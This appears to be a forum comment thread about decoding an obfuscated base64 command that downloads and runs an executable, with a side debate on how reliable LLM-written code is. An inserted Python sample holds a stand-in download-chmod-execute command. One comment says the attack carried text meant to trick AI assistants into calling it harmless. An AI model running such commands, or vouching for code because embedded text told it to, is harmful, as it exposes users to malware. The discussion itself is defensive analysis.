notRobot | 4 months ago
Before LLMs, someone who wasn't familiar with deobfuscation would have had no easy way to analyse the attack string the way they were able to do here.
spartanatreyu|4 months ago
Absolutely not.
I just wasted 4 hours debugging an issue because a developer decided to shortcut things and use an LLM to add just one more feature to an existing project. The LLM had changed the code in a non-obvious way to refer to things by ID, but the data source doesn't have IDs in it, which broke everything.
I had to instrument everything to find where the problem actually was.
As soon as I saw it was referring to things that don't exist, I realised it was created by an LLM instead of a developer.
LLMs can only create convincing-looking code. They don't actually understand what they're writing; they're just mimicking what they've seen before.
If they did have the capacity to understand, I wouldn't have lost those 4 hours debugging its approximation of code.
Now I'm trying to figure out if I should hash each chunk of data into an ID and bolt it onto the data chunk, or if I should just rip out the feature and make it myself.
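The first option described above can be done without touching the data source at all: derive a stable ID from each chunk's own content. A minimal Python sketch, assuming the chunks are strings (the `chunk_id` helper and sample data are illustrative, not from the project in question):

```python
import hashlib

def chunk_id(chunk: str) -> str:
    # Derive a stable, content-based ID by hashing the chunk itself,
    # so the data source never needs to carry explicit IDs.
    return hashlib.sha256(chunk.encode("utf-8")).hexdigest()[:12]

# The same content always maps to the same ID, so lookups by ID
# stay consistent across runs.
chunks = ["alpha record", "beta record"]
indexed = {chunk_id(c): c for c in chunks}
```

The trade-off is that the ID changes whenever the chunk's content changes, which may or may not be acceptable depending on how the feature uses the IDs.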
thaumasiotes|4 months ago
Decoded:
This isn't exactly obfuscated. Download an executable file, make it executable, and then execute it.
James_K|4 months ago
evan_|4 months ago
Claude reported basically the same thing from the blog post, but included an extra note:
> The comment at the end trying to trick me into saying it's harmless is part of the attack - it's attempting to manipulate AI assistants into vouching for malicious code.
croes|4 months ago
The command even mentions base64.
What if ChatGPT said everything is fine?
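For anyone who wants to check a payload like this themselves rather than trusting a chatbot's verdict, the safe pattern is to decode the base64 for inspection only, never executing the result. A minimal Python sketch with a hypothetical stand-in payload (the real attack string is not reproduced here):

```python
import base64

# Hypothetical stand-in for an obfuscated "download, chmod, run" payload.
encoded = base64.b64encode(
    b"curl -o /tmp/x https://example.com/x && chmod +x /tmp/x && /tmp/x"
)

# Decode for inspection only -- never pipe the result into a shell.
decoded = base64.b64decode(encoded).decode("utf-8")
print(decoded)
```

Reading the decoded text is enough to spot the download-and-execute pattern without running anything.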
Arainach|4 months ago
I'm very much an AI skeptic, but it's undeniable that LLMs have obsoleted 30 years' worth of bash-scripting knowledge. Any time I think "I could take 5 minutes and write that", an LLM can do it in under 30 seconds and adds far more input-validation checks than I would in 5 minutes. It also gets the regex right the first time, which is better than my grug brain manages for anything non-trivial.
lukeschlather|4 months ago
Maybe ChatGPT can execute malicious code, but that also seems less likely to be my problem.
lynx97|4 months ago